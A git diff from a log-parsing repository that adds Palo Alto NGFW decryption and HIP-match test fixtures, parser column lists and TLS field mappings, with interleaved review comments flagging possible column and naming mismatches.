@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", 
+ "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json 
@@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json 
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..b0b294778 --- /dev/null 
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} \ No newline at end of file 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..c0622d09c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
@@ -25,6 +25,7 @@
 "type": "globalprotect"
 },
 "host": {
+ "id": "e4f14dfd-bd3c-40e5-9c4e",
 "name": "LNL-test"
 },
 "log": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index edd76521b..4962d00cc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
@@ -82,7 +82,7 @@
 "8.7.6.5"
 ],
 "user": [
- "example.org",
+ "john.doe",
 "john.doe@example.org"
 ]
 },
@@ -103,9 +103,9 @@
 }
 },
 "user": {
- "domain": "john.doe",
+ "domain": "example.org",
 "email": "john.doe@example.org",
- "name": "example.org"
+ "name": "john.doe"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
index 6382be28b..3b3fd8fc6 100644
--- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
@@ -297,3 +297,18 @@ paloalto.threat.name:
 description: The name of the threat
 name: paloalto.threat.name
 type: keyword
+
+paloalto.tls.chain_status:
+ description: The trust in the TLS chain
+ name: paloalto.tls.chain_status
+ type: keyword
+
+paloalto.tls.root_status:
+ description: The trust in the root certificate
+ name: paloalto.tls.root_status
+ type: keyword
+
+paloalto.tls.sni:
+ description: The server name indication
+ name: paloalto.tls.sni
+ type: keyword
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 113ef7fdb..d212c5fcc 100644
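Review bot: The three new `paloalto.tls.*` descriptions do not say what values the keyword holds, and the fixtures in this same change show the two status fields arriving with different casing from the firewall (`ChainStatus: Uninspected` next to `RootStatus: uninspected` in the CSV sample, `Trusted` next to `trusted` in the JSON sample), which exact-match detection rules on either field will trip over. Suggest stating the observed value set and the caveat, e.g. `description: Trust status of the server certificate chain as reported by the firewall (e.g. Trusted, Untrusted, Uninspected; casing follows the log)` and the same shape for `root_status`, or normalising both with `| lower` in the parser so the description can promise a fixed case. For `sni`, `description: TLS server_name sent by the client in the ClientHello (client-supplied, not validated against the certificate)` would stop analysts treating it as the verified destination.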
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -142,7 +142,7 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USER
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -235,12 +235,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - 
CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse 
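Review bot: The DECRYPTION column list looks one entry short after `- ApplicationContainer`: the CSV sample in test_decryption_csv.json ends `,,ssl,no,no`, which under these names puts `ssl` into `ApplicationSaaS` and `no` into `ClusterName`, whereas `ssl` reads like a tunneled-application value and `no`/`no` like the SaaS and sanctioned-state flags, so a `- TunneledApplication` entry between `- ApplicationContainer` and `- ApplicationSaaS` appears to be missing and should be checked against the PAN-OS decryption log field reference for the targeted version. Two further names in this list do not match the mappings elsewhere in this change: the zones are declared `SourceZone`/`DestinationZone` while the observer mapping reads `FromZone`/`ToZone`, which is consistent with the CSV fixture's expected output having no `observer.ingress/egress.interface.alias` although the sample carries `VPN-SSL,INTERNET`; and the high-resolution column is `HighResTimestamp` here but `HighResolutionTimestamp` in the HIPMATCH list, and the decryption CSV fixture is stamped `2024-11-03T19:09:43Z` although its own high-resolution value says `+01:00`, while the HIPMATCH fixture from the same device is correctly shifted to `17:50:04Z`. The date-parse stage is outside this hunk so I cannot confirm that name is the cause, but a one-hour skew between decryption and every other log type will break cross-log timelines. Renaming to `- FromZone`, `- ToZone` and `- HighResolutionTimestamp` would align all three with the existing mappings.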
@@ -577,7 +738,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -593,6 +754,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
